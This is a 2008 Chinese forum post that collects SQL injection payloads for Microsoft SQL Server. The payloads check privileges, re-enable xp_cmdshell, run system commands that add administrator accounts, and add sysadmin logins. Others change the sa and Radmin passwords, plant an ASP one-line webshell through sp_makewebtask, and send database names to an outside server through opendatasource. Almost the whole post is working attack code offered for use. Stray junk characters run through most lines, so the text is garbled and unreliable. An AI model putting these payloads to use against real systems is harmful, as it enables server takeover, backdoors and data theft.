
icetears 发表于 2008-6-26 21:13

阿D常用注入命令收集整理

常用的注入代码
:adA6[8b@Zr
// 查看当前用户是什么权限
and 1=(Select IS_MEMBER('db_owner'))
1DaW-N A)Vf And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
3h#Sv~Y4zg
// 检测是否有读取某数据库的权限:
and 1= (Select HAS_DBACCESS('master'))
fz[:z1M"[ pa And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --%x2Y3i\d7Tm)x V

0K\)m5h2l_ *W7`$U;L6g!tb8T
数字类型
and char(124)%2Buser%2Bchar(124)=0
7ZkE Ek~ {~
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='5_#\Z\H oi5b+f
;x"j#h*amr,w U(O
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='f1wAI%v"t#{;Q

爆用户名
:P ZtI6~}z and user>0
A6Hcg.}V(I2HgA ' and user>0 and ''='
4A;F:eX2am'K0u
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--'zimw&\.b{:M
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
S-D L&]|D \ I @:h4H[bH
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
m\1bq jJ yL4Sye a;D vR
检测是否支持多行
;declare @d int;-- [_Kw ]/s)Y|D5I,de

恢复 xp_cmdshell
`}9VP.Tm*w ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- w/u9a+ta4s,@
Fu&{)N1j)H(j)m

:r)hKX)@A a select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
+L)v0Fa)G'[.h
//-----------------------
//      执行命令
//-----------------------
首先开启沙盘模式:
,H:i3q Wjdo&H exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
(jk c`}Yye $GaP.D"A
然后利用jet.oledb执行系统命令
4Q0kn-k6m zE select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")'),TA^ fa R
_~-G3`ys-Kj
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--B$y8s&o hYt
7{g/{?'B.@
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'%?1|2l-?9EVXh{
!m egy@)MJ:c;Q
判断xp_cmdshell扩展存储过程是否存在:
[url]http://192.168.1.5/display.asp?keyno=188[/url] and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')!UVd#lFof
#]j.i#_4FA)\1Qs
写注册表
'~O}5X1K@qn1X;n-a exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
.t'];[qR-u QZ*l;{A jf1D9d!H@
REG_SZ
?#i:U,z W4n N
读注册表
8rY,JR"q_ exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' {J-Il7mx(Roz2}
A4`spA;x(a$Or4v
读取目录内容
JM%XT S*y3y8G-B` exec master..xp_dirtree 'c:\winnt\system32\',1,1%@u T1PH W O

|0FGr;\
数据库备份
backup database pubs to disk = 'c:\123.bak'qIY4b2wt$e
B6D ?uXV2M
//爆出长度
O-bA%P7p6i0E*[{ And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
7s(FAw$Y:z hRN&m-D\

更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
*I5C7kJKq3y r /El2~0mM:A:Q
添加和删除一个SA权限的用户test:
{$p?V(p} exec master.dbo.sp_addlogin test,ptloveqEj#Rk,R~
exec master.dbo.sp_addsrvrolemember test,sysadmin
j4AS'h-L&gc:r6bV
删除扩展存储过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
0v Daj}*K
添加扩展存储过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
\0[*se#N l GRANT exec On xp_proxiedadata TO public %} g8`%]x4J'|4I%}d
2I%SD"re[H3O-s
a }To}]m
停掉或激活某个服务。
6yU1]6L2~e~W
.e$zkvS nmuG exec master..xp_servicecontrol 'stop','schedule'
9cP iL z d"mu P;D exec master..xp_servicecontrol 'start','schedule'n2[uBo;Yv*H*WTp

dbo.xp_subdirs
Bbs C1DF eG"\ n K Y9j
Z^q^ sIO
只列某个目录下的子目录。
5L:{i_tkw~:XU xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'QOD'v$r
&QPB'e \D-]
dbo.xp_makecab

将多个目标档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
s"k}8o\6K+b4t,vF
"z2@"fb'T dbo.xp_makecab
q!su#E"wGq8{F.lr 'c:\test.cab','mszip',1,9RH$?)GN9]0_J!l
'C:\Inetpub\wwwroot\SQLInject\login.asp',
b|&u:E"g$n#f,dO 'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
k%o)W x#UC
xp_terminate_process
BT0tl f /c?0w%_.s8RsAc
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用“工作管理员”,透过选单「检视」-「选择字段」勾选 PID,就可以看到每个执行程序的 Process ID
Qwp!v,F#c7_4s6K
xp_terminate_process 2484
7|(X'~1he 6x"sr#@ B{2S_-Su'J
xp_unpackcab
3|F*a [*O MZA
解开压缩档。
d^,a @ h5grI
xp_unpackcab 'c:\test.cab','c:\temp',1(~,@2[ c/Fj
IBW^ v#]k0f1cz
wg3@{2K q#?%go:j
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
|G/|%r\Y\ 9Kn }/L5ez
create database lcx;
l(z-C0Y"v-xy? Create TABLE ku(name nvarchar(256) null);(k+ZOYV]5A
Create TABLE biao(id int NULL,name nvarchar(256) null);XY [e!Xe!P s |
9~E$r.k]5m {X#yj
//得到数据库名
[6m C,vIo.Y insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
/ioM*O#{)_
%xZu'bh6? G4]!]#gr&Uq
//在Master中创建表,看看权限怎样
C;x P/_/HBi } Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
*{C\ Y(^'A.A{ZA d:m%B3S$uIH-V bt
用 sp_makewebtask直接在web目录里写入一句话马:yP QM|&\
[url]http://127.0.0.1/dblogin123.asp?username=123'[/url];exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--;AD#f9i0id5e*?
/_o[ X^
//更新表内容
w+J e7Xb5v n Update films SET kind = 'Dramatic' Where id = 123
+Rumw| `6}c;l2W2x
//删除内容
G[ y:b{p*w!@ delete from table_name where Stockid = 3
